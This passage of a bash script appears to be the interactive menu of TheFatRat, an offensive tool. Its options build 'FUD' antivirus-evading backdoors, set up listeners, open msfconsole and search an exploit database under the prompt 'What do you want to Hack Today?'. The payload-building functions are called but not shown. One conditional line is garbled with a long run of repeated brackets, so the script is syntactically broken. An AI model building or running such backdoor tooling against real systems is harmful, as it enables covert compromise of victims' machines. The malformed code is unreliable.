echo -e $white" [$okegreen"2"$white]$okegreen CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL ) "
echo -e $white" [$okegreen"3"$white]$okegreen CREATE FUD BACKDOOR WITH AVOID 1.2 "
echo -e $white" [$okegreen"4"$white]$okegreen CREATE A LISTENERS "
echo -e $white" [$okegreen"5"$white]$okegreen JUMP TO MSFCONSOLE "
echo -e $white" [$okegreen"6"$white]$okegreen SEARCHSPLOIT "
echo -e $white" [$okegreen"7"$white]$okegreen HELP "
echo -e $white" [$okegreen"8"$white]$okegreen CREDITS "
echo -e " "
echo -n -e $red' \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice
read fatrat
if test $fatrat == '1'
then
cmsfvenom
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm ./powerfull.sh
elif test $fatrat == '3'
then
avoid
elif test $fatrat == '4'
then
clisteners
elif test $fatrat == '5'
then
xterm msfconsole
elif test $fatrat == '6'
then
clear
echo -e "\033[31mWhat do you want to Hack Today?\033[m"
echo -e "\033[31mEnter a search term and hit Enter\033[m"
read searchterm
gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2
menu
elif test $fatrat == '7'
then
firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md
elif test $fatrat == '8'
then
credits
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) :"
read back
if [ $back != 'n' ] && [ $back != 'N' ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
menu
fi